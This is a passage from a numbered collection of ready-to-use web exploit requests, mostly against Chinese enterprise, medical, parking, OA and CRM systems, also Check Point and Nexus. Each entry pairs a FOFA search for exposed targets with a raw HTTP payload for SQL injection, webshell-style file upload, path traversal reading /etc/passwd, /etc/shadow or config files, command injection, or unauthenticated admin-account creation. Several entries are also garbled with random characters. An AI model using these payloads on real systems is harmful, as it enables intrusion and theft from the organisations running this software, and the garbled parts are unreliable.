Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}


155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--


Access the echoed file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")

POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.

POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"

POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"

POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"

POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"

URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"

POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"

GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"

GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"

POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

" ]$ d o! |$ | f+ \( o174. 金和OA C6 FileDownLoad.aspx 任意文件读取' s& ^. Z9 ?# w: j' N" _) V# h
FOFA:app="金和网络-金和OA"
1 D: Q) o9 D0 KGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
2 T" K0 B+ v8 b. e4 H# t- h! mHost: your-ip
) i8 z. L% V; A' ?. fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. m7 ?: P6 G8 s- t" L: s; Q7 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 w) P( W( h* @! t& z* ]' T2 GAccept-Encoding: gzip, deflate, br
+ ]8 y, k+ |2 C' G" p# o+ Y4 A/ [Accept-Language: zh-CN,zh;q=0.9& R( G- S* g# F5 R$ M! s8 R
Connection: close# X5 v1 |! r2 ~6 ]5 T1 g) `
+ T7 Q V+ T! G7 v/ K
. k: ]# l" ^0 p# t& N' W
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"

POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure

/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"

POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

" ^. k( h) J1 c& @4 W179. 建文工程管理系统存在任意文件读取$ {- |8 A0 b4 a/ ]! ?( F
POST /Common/DownLoad2.aspx HTTP/1.1. r4 k% I0 ?) U$ B# N5 @& p
Host: {{Hostname}}
, O5 U$ d' C; C9 N' ?( d1 lContent-Type: application/x-www-form-urlencoded
6 S% D4 L _ Z& Q. t1 r( K5 DUser-Agent: Mozilla/5.0
R' t$ B$ \) Y7 |- e# |& [& f" F
7 F: Z! A& K1 N, R/ d) M; Ppath=../log4net.config&Name=4 p% Y" v0 {4 t3 [, E5 {4 ?) [
$ ?% W9 g, N5 ?3 V
180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"

POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"

POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"

GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"

POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"

POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"

GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

/ p" s9 {- K7 J+ {. Q5 @& S189. 蓝网科技临床浏览系统 deleteStudy SQL注入; ^3 z# K y6 r7 x3 ^5 q7 o& v7 x4 M
FOFA:app="LANWON-临床浏览系统"
6 g3 h2 x5 `9 R% ? N3 VGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
! j+ n% Q3 _) V1 B4 BHost: your-ip6 f8 F/ O" Q( M, A9 a
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.367 ? D( K/ C5 c! ~! L9 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) O1 f+ A- x, y1 l# z$ V. M
Accept-Encoding: gzip, deflate
- n+ u4 z* s- n1 y, S/ a- IAccept-Language: zh-CN,zh;q=0.9
% ?* d4 z, @9 a) w8 k; i: DConnection: close% A4 s6 F) P- F
, _# \* ~6 w) C" `
190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"

POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"

POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet access behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
